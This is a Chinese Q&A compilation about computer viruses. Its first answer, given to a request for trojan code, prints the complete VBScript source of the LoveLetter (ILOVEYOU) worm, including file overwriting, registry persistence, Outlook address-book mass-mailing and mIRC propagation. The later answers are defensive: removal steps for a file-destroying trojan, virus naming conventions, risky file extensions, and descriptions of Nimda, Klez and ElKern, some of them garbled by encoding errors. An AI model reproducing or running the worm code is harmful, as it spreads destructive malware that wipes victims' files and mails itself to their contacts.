本文目录一览:
谁有木马或病毒代码 用那种文本文档的
你可以看看这个:
:)
rem barok -loveletter(vbe) i hate go to school
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group
/ Manila,Philippines
On Error Resume Next
dim
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows
Scripting Host\\Settings\\Timeout")
if (rr=1) then -设置超时
wscr.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows
Scripting Host\\Settings\\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem"\\MSKernel32.vbs") -复制文件
c.Copy(dirwin"\\Win32DLL.vbs") -复制文件
c.Copy(dirsystem"\\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MSKernel32",dirsystem"\\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\Win32DLL",dirwin"\\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet
Explorer\\Download Directory")
if (downread="") then
downread="c:\\"
end if
if (fileexist(dirsystem"\\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," "
elseif num = 2 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," "
elseif num = 3 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," "
elseif num = 4 then
regcreate "HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page"," "
end if
end if
if (fileexist(downread"\\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WIN-BUGSFIX",downread"\\WIN-BUGSFIX.exe"
regcreate
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet
Explorer\\Main\\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path"\\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or
(ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec"\\"bname".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or
(s="mirc.ini") or (s="script.ini") or (s="mirc.hlp")
then
set
scriptini=fso.CreateTextFile(folderspec"\\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script...
mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect
and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine "; "
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt
}"
scriptini.WriteLine "n2= /.dcc send $nick
"dirsystem"\\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim
x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf"kindly check the attached
LOVELETTER coming from me."
male.Attachments.Add(dirsystem"\\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="HTMLHEADTITLELOVELETTER -
HTML?-?TITLEMETA NAME=@- @ Generator@- @
CONTENT=@- @BAROK VBS - LOVELETTER@- @"vbcrlf _
"META NAME=@- @ Author@- @ CONTENT=@- @spyder ?-?
ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila,
Philippines ?-? March 2000@- @"vbcrlf _
"META NAME=@- @ Description@- @ CONTENT=@- @simple but i
think this is good...@- @"vbcrlf _
"?-?HEADBODY
onmouseOUT=@- @window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
"vbcrlf _
" ONKEYDOWN=@- @window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
BGPROPERTIES=@- @ fixed@- @
BGCOLOR=@- @ #FF9933@- @"vbcrlf _
"CENTERpThis HTML file need ActiveX
Control?-?ppTo Enable to read this HTML fileBR-
Please press #-#YES#-# button to Enable
ActiveX?-?p"vbcrlf _
"?-?CENTERMARQUEE LOOP=@- @ infinite@- @
BGCOLOR=@- @ yellow@- @----------z--------------------z----------?-?MARQUEE
"vbcrlf _
"?-?BODY?-?HTML"vbcrlf _
"SCRIPT language=@- @ JScript@- @"vbcrlf _
"!--?-??-?"vbcrlf _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"vbcrlf
_
"?-??-?--"vbcrlf _
"?-?SCRIPT"vbcrlf _
"SCRIPT LANGUAGE=@- @ VBScript@- @"vbcrlf _
"!--"vbcrlf _
"on error resume next"vbcrlf _
"dim
fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"vbcrlf
_
"aw=1"vbcrlf _
"code="
dta2="set
fso=CreateObject(@-@ Scripting.FileSystemObject@- @)"vbcrlf
_
"set dirsystem=fso.GetSpecialFolder(1)"vbcrlf _
"code2=replace(code,chr(91)chr(45)chr(91),chr(39))"vbcrlf
_
"code3=replace(code2,chr(93)chr(45)chr(93),chr(34))"vbcrlf
_
"code4=replace(code3,chr(37)chr(45)chr(37),chr(92))"vbcrlf
_
"set
wri=fso.CreateTextFile(dirs dirsystem@- @ ^-^MSKernel32.vbs@- @)"vbcrlf
_
"wri.write code4"vbcrlf _
"wri.close"vbcrlf _
"if
(fso.FileExists(dirs dirsystem@- @ ^-^MSKernel32.vbs@- @))
then"vbcrlf _
"if (err.number=424) then"vbcrlf _
"aw=0"vbcrlf _
"end if"vbcrlf _
"if (aw=1) then"vbcrlf _
"document.write @-@ERROR: can#-#t initialize
ActiveX@- @"vbcrlf _
"window.close"vbcrlf _
"end if"vbcrlf _
"end if"vbcrlf _
"Set regedit =
CreateObject(@-@ WScript.Shell@- @)"vbcrlf _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Soft ware^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@- @,dirs dirsystem@- @ ^-^MSKernel32.vbs@- @"vbcrlf
_
"?-??-?--"vbcrlf _
"?-?SCRIPT"
dt1=replace(dta1,chr(35)chr(45)chr(35),"\'")
dt1=replace(dt1,chr(64)chr(45)chr(64),"""")
dt4=replace(dt1,chr(63)chr(45)chr(63),"/")
dt5=replace(dt4,chr(94)chr(45)chr(94),"\\")
dt2=replace(dta2,chr(35)chr(45)chr(35),"\'")
dt2=replace(dt2,chr(64)chr(45)chr(64),"""")
dt3=replace(dt2,chr(63)chr(45)chr(63),"/")
dt6=replace(dt3,chr(94)chr(45)chr(94),"\\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"\'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)"vbcrlf _"
end if
next
set
b=fso.CreateTextFile(dirsystem+"\\LOVE-LETTER-FOR-YOU.HTM")
b.close
set
d=fso.OpenTextFile(dirsystem+"\\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
中了病毒文件杀手的症状有哪些啊``
病毒文件杀手是新病毒吗?
病毒自动感染可移动磁盘的每一个目录,复制一个文件名为:"Project.pjx.exe"的文件到每一个目录下,该文件执行后将释放几个文件到系统中:
cmd.exe -〉该文件覆盖系统的CMD.EXE,运行后只简单显示一个字符串:“C:\”,迷惑用户
cmd.lnd.dll -〉该文件是文件:"Project.pjx.exe"的副本
iexplorex.dll -〉这是病毒的主要功能模块,将以组件方式运行,进行破坏活动。
该病毒:
隐藏自己,遍历所有驱动器,当发现该驱动器为可移动设备时将在该驱动器的所有目录下复制病毒的副本。
检查当前系统日期是否为周六或周日,时间大于13:00,成立则进行破坏活动;
该病毒主要破坏Visual Fox Pro的相关文件如:“*.SCT、*.pjx、.*.prg、*.dbf、*.doc”等,将该文件填充空格。
金山毒霸信息安全网站
这是一个破坏Visual FoxPro文件的木马病毒。该病毒会遍历所有驱动器,如果当前驱动器是可移动磁盘,病毒就会将自己拷贝为Project.pjx.exe到该驱动器的所有目录下(包括子目录)。该病毒运行的时候会检测当前系统时间是否为周六或周日并且是13:00以后,如果条件成立,该病毒就会破坏Visual FoxPro的相关文件(如:.SCT、.pjx、.prg、.dbf、.doc等),将这些文件填为空格。此外,该病毒还会修改IE浏览器的某些设置,使得用户在使用IE浏览器的时候会出现一些错误。
1)病毒复制一个文件名为“Project.pjx.exe”的文件到可移动磁盘的每一个目录下,该文件执行后会释放以下3个文件:
%SystemRoot%\cmd.lnd (病毒副本)
%SystemRoot%\iexplorex.dll (病毒Win32.Troj.HavedoDll.a)
%System%\cmd.exe (该文件是病毒释放的,系统的cmd.exe已经被它覆盖。该cmd.exe运行时只简单显示一个字符串“C:\”来迷惑用户)
2)修改IE浏览器的某些设置:
HKEY_CLASSES_ROOT\CLSID\{37125E31-AD55-4F7B-BF6F-A17A20953945}\(Default)=""
HKEY_CLASSES_ROOT\CLSID\{37125E31-AD55-4F7B-BF6F-A17A20953945}\InprocServer32\(Default)="%SystemRoot%\iexplorex.dll"
HKEY_CLASSES_ROOT\CLSID\{37125E31-AD55-4F7B-BF6F-A17A20953945}\InprocServer32\ThreadingModel="Apartment"
HKEY_CLASSES_ROOT\iexplorex.IEHelper\(Default)=""
HKEY_CLASSES_ROOT\iexplorex.IEHelper\Clsid\(Default)="{37125E31-AD55-4F7B-BF6F-A17A20953945}"
HKEY_CLASSES_ROOT\CLSID\{37125E31-AD55-4F7B-BF6F-A17A20953945}\ProgID\(Default)="iexplorex.IEHelper"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue=0x0
由此可见,该病毒会破坏.doc文件,这可是非常重要的!(我已经被破坏了一个文档了)而且打开“我的电脑-菜单-工具-文件夹选项-查看”中“隐藏文件和文件夹”这里,始终会设置为“不显示隐藏的文件和文件夹”,即使修改为“显示所有文件和文件夹”后,仍然会自己改回来,这样,具有隐藏属性的文件(包括病毒等)将不会被显示,这给排除病毒带来了很大的麻烦,而且我们设为隐藏属性的文件则再也看不到了。
下面我说说我通过手工排除这个病毒的步骤,虽然不是最完美的,起码上面的问题已经成功的解决掉了,第一时间先发出来给大家看看,希望能帮上大家的忙,也希望有朋友加以指正。
1、首先,这个病毒会附在explorer.exe和iexplore.exe中启动,但在进程列表中看不见,所以,先改注册表。我没有按照上面注册表项一个个修改,因为我在改之前还没看到这些病毒报告呢!只要搜索“iexplorex”项,将找到的项删除即可,共有两项。
2、删除iexplorex.dll文件。直接删除是不行的,因为它正在运行中。在“运行”中输入“cmd”打开命令提示符,运行“tasklist /M 1.txt”,将目前所运行的进程及关联模块文件列出并输出到1.txt文件中,因为内容很多,屏幕会显示不够长。打开1.txt文件,搜索“iexplorex”文本,找到它出现的位置,其所属进程一般为explorer和iexplore,打开任务管理器,将这两个进程卸掉,然后删除iexplorex.dll文件,再启动explorer.exe。如果出现上面说的假提示符,则说明cmd.exe文件已被修改,可将xp安装光盘插入,运行“sfc /scannow”程序来恢复被修改的文件,然后启动命令提示窗口,步骤同上。也可以用xp安装光盘启动,进入恢复模式,手动恢复cmd.exe文件,然后删除iexplorex.dll文件。
3、修改隐藏文件显示设置。打开注册表,找到“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden”选项,将“SHOWALL\CheckedValue”的值改为1,确认“DefaultValue”为2。在“NoHidden”项下对应的这两个值为2,2。然后打开“我的电脑”检查“显示所有文件和文件夹”是否可以选中并保持。
4、选择“显示所有文件和文件夹”选项后,搜索硬盘和移动存储器中有没有上面列出的“project.pjx.exe”和“cmd.lnd.dll”文件,找到并删除。至此病毒排除完成!
还有最好安装一些象卡巴之类的杀毒软件和防火墙。
那个能告诉我常见的病毒后缀名啊,
病毒的命名规则
病毒的命名并没有一个统一的规定,每个反病毒公司的命名规则都不太一样,但基本都是采用前、后缀法来进行命名的,可以是多个前缀、后缀组合,中间以小数点分隔,一般格式为:〔前缀〕.〔病毒名〕.〔后缀〕
1.病毒前缀
病毒前缀是指一个病毒的种类,我们常见的木马病毒的前缀是“Trojan”,蠕虫病毒的前缀是“Worm”,其他前缀还有如“Macro”、“Backdoor”、“Script”等。
2.病毒名
病毒名是指一个病毒名称,如以前很有名的CIH病毒,它和它的一些变种都是统一的“CIH”,还有振荡波蠕虫病毒,它的病毒名则是“Sasser”。
3.病毒后缀
病毒后缀是指一个病毒的变种特征,一般是采用英文中的26个字母来表示的,如 “Worm.Sasser.c”是指振荡波蠕虫病毒的变种c。如果病毒的变种太多了,那也可以采用数字和字母混合的方法来表示病毒的变种。
综上所述,一个病毒的前缀对我们快速的判断该病毒属于哪种类型的病毒是有非常大的帮助的。通过判断病毒的类型,就可以对这个病毒有个大概的评估(当然这需要积累一些常见病毒类型的相关知识,这不在本文讨论范围)。而通过病毒名我们可以利用查找资料等方式进一步了解该病毒的详细特征。病毒后缀能让我们知道现在在你机子里呆着的病毒是哪个变种。
病毒的命名解释
1.木马病毒
木马病毒的前缀是:Trojan。木马病毒的特点就是通过网络或者系统漏洞进入用户的系统并隐藏,然后再向外界泄露用户的信息。一般的木马如QQ消息尾巴Trojan.QQPSW.r,网络游戏木马病毒Trojan.StartPage.FH等。病毒名中有PSW或者什么PWD之类的是表示这个病毒有盗取密码的功能,所有这类病毒特别需要注意。
2.脚本病毒
脚本病毒的前缀是:Script。脚本病毒是用脚本语言编写,通过网页进行的传播的病毒,如红色代码Script.Redlof等。有些脚本病毒还会有VBS、HTML之类的前缀,是表示用何种脚本编写的,如欢乐时光VBS.Happytime、HTML.Reality.D等。
3.系统病毒
系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的特点是可以感染Windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播,如以前有名的CIH病毒就属于系统病毒。
4.宏病毒
宏病毒也可以算是脚本病毒的一种,由于它的特殊性,因此就单独算成一类。宏病毒的前缀是:Macro,第二前缀有Word、Word97、Excel、Excel97等,根据感染的文档类型来选择相应的第二前缀。该类病毒的特点就是能感染OFFICE系列的文档,然后通过OFFICE通用模板进行传播,如以前著名的美丽莎病毒Macro.Melissa。
5.蠕虫病毒
蠕虫病毒的前缀是:Worm。这种病毒的特点是可以通过网络或者系统漏洞来进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性,大家比较熟悉的这类病毒有冲击波、震荡波等。
6.捆绑机病毒
捆绑机病毒的前缀是:Binder。病毒作者会使用特定的捆绑程序把病毒与一些应用程序(如QQ等大家常用的软件)捆绑起来,表面上看去是个正常的文件,但当用户运行这些应用程序时,也同时运行了被捆绑在一起的病毒文件,从而给用户造成危害。如系统杀手Binder.killsys。
7.后门病毒
后门病毒的前缀是:Backdoor。该类病毒的特点就是通过网络传播来给中毒系统开后门,给用户电脑带来安全隐患。如爱情后门病毒Worm.Lovgate.a/b/c。
8.破坏性程序病毒
破坏性程序病毒的前缀是:Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。如:格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。
9.玩笑病毒
玩笑病毒的前缀是:Joke。也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒会做出各种破坏操作来吓唬用户,其实病毒并没有对用户电脑进行任何破坏。如:女鬼(Joke.Girlghost)病毒。
以上为比较常见的病毒前缀,有时候我们还会看到一些其他的,但比较少见,这里简单提一下:
DoS:会针对某台主机或者服务器进行DoS攻击;
Exploit:会自动通过溢出对方或者自己的系统漏洞来传播自身,或者他本身就是一个用于Hacking的溢出工具;
HackTool:黑客工具,也许本身并不破坏你的机子,但是会被别人加以利用来用你做替身去破坏别人。
你可以在查出某个病毒以后通过以上所说的方法来初步判断所中病毒的基本情况,达到知己知彼的效果。在杀毒无法自动查杀,打算采用手工方式的时候这些信息会给你很大的帮助
常见的病毒后缀多为exe,但是也有dll的及其很多种
ad[ep]
.asd
.ba[st]
.c[ho]m
.cmd
.cpl
.crt
.dbx
.dll
.exe
.hlp
.hta
.in[fs]
.isp
.js
.jse
.lnk
.md[etw]
.ms[cipt]
.nws
.ocx
.ops
.pcd
.pi
.prf
.reg
.scf
.scr
.sct
.sh[bms]
.uue
.vb
.vb[esx]
.vxd
.wab
.ws[cfh]
.cmd
.bat
.com
.exe
.scr
.cpl
.rtf
.wab
.cpp
.pas
.mp8
.bak
.mpg
.tmp
.wab
.dbx
.tbb
.sht
.mbx
.eml
.pmr
.fpt
.inb
.adb
.asp
.cfg
.cgi
.dbx
.dhtm
.eml
.jsp
.mbx
.mdx
.mht
.mmf
.msg
.nch
.ods
.oft
.php
.pl
.sht
.shtm
.stm
.tbb
.txt
.uin
.uin
.wab
.wsh
.vbs
告诉我一些有名的病毒,及他们分别怎样攻击电脑?
一、VBS.LoveLetter@MM
这是一个Loveletter病毒家族的变种,该病毒通过下面的邮件传播:
主题:: Where are you?
消息主体: This is my pic in the beach!
附件: JENNIFERLOPEZ_NAKED.JPG.vbs
VBS.Loveletter.CN@mm还安装文件Cih_14.exe,该文件是CIH病毒的安装器,并企图运行CIH病毒。
当执行时,病毒VBS.Loveletter.CN@mm将试图完成下面的工作:
1、修改注册键中的"Timeout" 键值,这样当 诵薪铣な奔湎低巢换嵯允鞠�ⅰH缓螅�《舅阉魉�锌捎玫那��鳎�檎揖哂邢铝欣┱姑�奈募�?
--扩展名为.vbe, .jpg, .jpeg 的文件被替换成 《镜母北尽?
--扩展名为.js, .jse, .css, .wsh, .sct, 和.hta 的文件将被 《靖北咎婊唬�⑶椅募�睦┱姑�崽砑?vbs 。例如:原文件Filename.wsh 变成Filename.wsh.vbs.
--扩展名为.mp2 和.mp3的文件被复制,副本的扩展名中将添加.vbs的后缀,原文件被标记为隐藏。
2、创建下面的注册键:
HKEY_CURRENT_USER\Software\JENNIFFERLOPEZ_NAKED\Worm made in algeria
3、添加注册键值:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
值:WORM w exe \\JENNIFERLOPEZ_NAKED.JPG.vbs %
以便每次windows启动都运行该病毒。
4、检查注册键:
HKEY_CURRENT_USER\Software\JENNIFFERLOPEZ_NAKED的值是否为:mailed = 1
如果不是,则执行发送邮件功能,发送完邮件,将其值设为1。
5、蠕虫编写十六进制的文件并将其保存为\Windows\Cih_14.exe。该文件包含一个CIH病毒的安装器,之后执行该文件。一旦执行,病毒将驻留内存(win98/me),并感染PE可执行文件。
二、W32.Nimda.htm
Worms.Nimda 是一个新型蠕虫,也是一个病毒,它通过email、共享网络资源、IIS服务器传播。同时它也是一个感染本地文件的新型病毒。
Worms.Nimda运行时,会搜索本地硬盘中的HTM和HTML文件和EXCHANGE邮箱,从中找到EMAIL地址,并向这些地址发邮件;搜索网络共享资源,并试图将带毒邮件放入别人的共享目录中;利用CodeBlue病毒的方法,攻击随机的IP地址,如果是IIS服务器,并未安装补丁,就会中毒。该蠕虫用它自己的的SMTP服务器去发出邮件。同时用已经配置好的DNS获得一个mail服务器的地址。
Worms.Nimda运行时,会查找本地的HTM/ASP文件,将生成的带毒邮件放入这些文件中,并加入java 疟尽U庋��康备猛�潮淮蚩�保�突嶙远�蚩�萌径镜膔eadme.eml。
Worms.Nimda感染本地PE文件时,有两种方法,一种是查找所械腤INDOWS 应用程序(在HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Currentversion/App Paths中),并试图感染之,但不感染WINZIP32.EXE;第二种方法搜索所有文件,并试图感染之。被感染的文件会增大约57KB。
如果用户游览了一个已经被感染的web 页时,就会被提示下载一个.eml(Outlook Express)的电子邮件文件,该邮件的MIME头是一个非正常的MIME头,并且它包含一个附件,即此蠕虫。这种邮件也可能是别人通过网络共享存入你的计算机中,也可能是在别人的共享目录中,无论如何,只要你在WINDOWS的资源管理器中选中该文件,WINDOWS将自动预览该文件,由于Outlook Express的一个漏洞,导致蠕虫自动运行,因此即使你不打开文件,也可能中毒,相关信息请参见微软安全网站:,同时,该漏洞已有安全补丁:。
当这个蠕虫执行的时候,它会在WINDOWS目录下生成MMC.EXE文件,并将其属性改为系统、隐藏;它会用自己覆盖SYSTEM目录下的RICHED20.DLL,这个文件是OFFICE套件运行的必备库,WINDOWS的写字板等也要用到这个动态库,任何要使用这个动态库的程序试图启动时,都会激活该它;它会将自己复制到SYSTEM目录下,并改名为LOAD.EXE,同时将SYSTEM.INI文件中的SHELL项改为“explorer.exe load.exe - dontrunold”,这样,在系统每次启动时,将自动运行它;这个蠕虫会在已经感染的计算机共享所有本地硬盘,同时,这个蠕虫会以超级管理员的权限建立一个guest的访问帐号,以允许别人进入本地的系统。这个蠕虫改变Explorer的设置这样就让它无法显示隐藏文件和已知文件的扩展名
三、W32.Elkern.cav.c
W32.ElKern.3326感染共享文件、映像驱动器,同时该病毒还会感染本机硬盘的\Windows\System目录中的文件。
如果病毒是在Windows NT/2000系统中被激活,当第一次被激活后,病毒变会蹦溃。
如果病毒在Windows 9x系统中被激活并且本机有带写保护的网络映像,很短的时间后,病毒将使机器当掉。
病毒感染文件后,文件的大小并不改变。
W32.ElKern.3326在感染文件时可能是空的感染源也可能是“添加器”,这就意味着,如果可能,病毒将拒绝将自身代码添加到宿主文件内,免得文件的尺寸变大。
一旦病毒被激活,它将创建一个自身的可执行文件后,直接控制对宿主文件。
在\Windows\System目录中创建自身的副本,文件名依不同的系统而不同:
1)Windows 95/98/Me: %System%\Wqk.exe
2)Windows NT/2000: %System%\Wqk.dll
根据不同的操作系统,W32.ElKern.3326创建不同的不同的注册键:
1)Windows 95/98/Me
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
值:WQK %System%\Wqk.exe
2)HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
值:AppInit_DLLs %System%\Wqk.dll
etween each file that it tries to infect.
四、VBS.Redlof@M
1.此病毒属于脚本类病毒,此病毒感染脚本类型的文件。
2.此病毒运行时,全盘查找脚本类型的文件{vbs,htm, html等),如果找到,则将病毒自身加入这些文件的尾部,完成感染。
3.此病毒感染目录时,还会在一些目录下产生两个文件,一个名为:desktop.ini的目录配置文件,一个名为:folder.htt的病毒体文件。
五、W32.Klez
该病毒基本分为两部分:一部分是狭义上的病毒,它感染PE结构文件,病毒大小约为3K,用汇编语言编写;第二部分是蠕虫大小为56K,它在运行中会释放并运行一个11722字节的带毒的PE文件。第二部分是用VC++编写的,它只可以在WINDOWS 9X或WINDOWS2000上运行,在NT4上无法运行。
它的传播方式有四种:
第一种:通过INTERNET邮件,它搜索当前用户的地址簿文件中的类邮件地址的文本内容,或随机计算邮件地址,通过WINDOWS的SOCKET函数集用SMTP服务器发送自己这个带毒木马,邮件文件是由木马部分形成,并且该邮件会在OUTLOOK EXPRESS下自动执行,它的主题是随机的,但以下几种情况:
Hi
Hello
How are you?
Can you help me?
We want peace.
Where will you go?
Congratulations!!!
Don't cry.
Look at the pretty.
Some advice on your shortcoming.
Free XXX Pictures.
A free hot porn site.
Why don't reply to me?
How about have dinner with me together?
信的正文为:
I'm sorry to do so,but it's helpless to say sorry.
I want a good job,I must support my parents.
Now you have seen my technical capabilities.
How much my year-salary now? NO more than $5,500.
What do you think of this fact?..Don't call my names,I have no hostility.
Can you help me?
第二种:通过网络邻居,它搜索所有的网络连接,查找共享目录,将自己的文件放到享目录中,并试图让远程计算机将它作为一个服务启动。
第三种:通过磁盘传播,它创建专门的线程感染磁盘,如果当前日期奇数月的13号,将找到的文件内容进行复制。
第四种:方式病毒感染。
病毒部分的运行过程:
1、解密后面的代码长度258H字节
2、然后病毒在内存中查找KERNEL32模块,并根据名字的检验字找到一大批函数入口,这些函数供后面的代码调用。
3、申请内存,将所有代码拷贝到申请的内存中,并转申请的内存执行。
4、查检有无调试程序(调IsDebugPresent函数),如在调试程序下运行,终止病毒代码,返回到原宿主程序(如果是配套的木马,则返回到操作系统)。
5、启动感染代码,如未在调试程序下运行,在SYSTEM(由GetSystemDirectory)目录感染或建立WQK.EXE(WIN9X下)或WQK.DLL(NT下)。
6、将当前进程注册为服务进程。
7、创建感染线程,根据系统时间,如果为13号且为3月或9月,感染所有硬盘或网络盘文件。否则感染系统目录。某些条件下创始的感染线程会启动另一个感染线程,直到系统崩溃。
8、如果是NT操作系统,同时感染所有网络邻居。
9、返回宿主或操作系统。
木马部分运行过程:
1、解码所有字符串。
2、改变当前进程访问权限。
3、启动线程1,线程1的作用如下:
检查当前所有进程,如果有以下进程(部分匹配),则终止这些进程:
_AVP32, _AVPCC, _AVPPM, ALERTSVC,AMON
AVP32,AVPCC,AVPM,N32SCANW,NAVAPSVC,
NAVAPW32,NAVLU32,NAVRUNR,NAVW32,NAVWNT,
NDD32,NPSSVC,NRESQ32,NSCHED32,NSCHEDNT,
NSPLUGIN,SCAN,SMSS
如果是WINDOWS9X系统,将当前程序设为自启动(Software\Microsoft\Windows\CurrentVersion\Run)线程永不终止。
4、启动线程2,作用如下:
复制自己,运行后删除,然后线程终止。
5、在系统目录中创建KRNL32.EXE,如果是9X,运行它,并将它放入 Software\Microsoft\Windows\CurrentVersion\Run 中自动运行。如果是2000系统,
将它作为Service启动。
